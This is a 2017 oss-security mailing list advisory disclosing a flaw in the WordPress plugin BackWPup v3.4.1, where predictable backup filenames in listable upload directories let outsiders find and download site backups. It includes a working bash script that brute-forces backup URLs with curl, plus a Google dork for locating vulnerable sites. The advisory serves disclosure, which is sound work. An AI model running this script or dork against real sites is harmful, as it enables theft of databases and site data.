Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 27 Sep 2017 12:13:47 -0400
From: "Larry W. Cashdollar" <>
To: Open Source Security <>
Subject: Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute
 forcing of backup file download

Title: Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file download
Author: Larry W. Cashdollar, @_larry0
Date: 2017-09-08
Download Site:
Vendor: Inpsyde
Vendor Notified: 2017-09-08, fixed v3.4.2
Vendor Contact:
Description: "The backup plugin BackWPup can be used to save your complete installation including /wp-content/ and push them to an external Backup Service, like Dropbox, S3, FTP and many more."
There is a weakness in the way backwpup creates and stores the backup files it generates.  It creates a random string to obscure the location, but
it uses that same string to create the storage directory under wp-content/uploads/ which in most installations of WordPress allows file listings.

Someone looking to steal a copy of the database could simply list the directories in /uploads to find that random string and then brute force the location of the file as its structure is just a date and time stamp.  It would take a Maximum of 86400 tries to guess if a backup is available for that day.  
Filename format: 
backwpup_ RANDOMSTRINGBACKUPNUMBER_%Y-%m-%d_%H-%i-%s

Default settings are:

%d = Two digit day of the month, with leading zeros
%m = Day of the month, with leading zeros
%Y = Four digit representation for the year
%H = Hour in 24-hour format, with leading zeros
%i = Two digit representation of the minute
%s = Two digit representation of the second

Exploit Code:
	• #!/bin/bash
	• #Exploit for Wordpress Plugin BackWPup v3.4.1
	• #Download
	• #CWE-552: Files or Directories Accessible to External Parties
	• #CVE-ID: CVE-2017-2551
	• #Google Dork: inurl:wp-content/uploads/backwpup
	• #Add banner about vulnerability
	• KEY=`curl --silent http://$1/wp-content/uploads/|html2text |grep backups | awk -F- '{print $2}'`
	• #Add error checking here
	• echo "[+] Getting Unique Key $KEY"
	• DIR="backwpup-$KEY-backups"
	• echo "[+] Checking directory $DIR"
	• WPATH="$DIR/backwpup_$KEY"
	• echo "[+] Creating Path: $WPATH"
	• #use date command here for the default date of current day
	• MONTH=09
	• DAY=07
	• YEAR=2017
	• Z=0
	• echo "[+] Scanning website for available backups:"
	• for y in `seq -w 0 23`; do
	•         for x in `seq -w 0 59`; do
	•                  Y=`echo "scale=2;($Z/86000)*100"|bc`;
	•                  echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CWPATH $Y%"
	•         for z in `seq -w 0 59`; do
	•                  Z=$(( $Z + 1 ));
	•                  CWPATH="http://$1/wp-content/uploads/$WPATH"01"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
	•                  RESULT=`curl -s --head $CWPATH|grep 200`;
	•                 if [ -n "$RESULT" ]; then
	•                  echo ""
	•                  echo "[+] Location $CWPATH Found";
	•                  echo "[+] Received $RESULT";
	•                  echo "Downloading......";
	•                 # wget $CWPATH
	•                   exit;
	•                 fi;
	•         done
	•         done
	• done
	• echo "Completed."
Screen Shots:
Notes: Google Dork: inurl:wp-content/uploads/backwpup

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.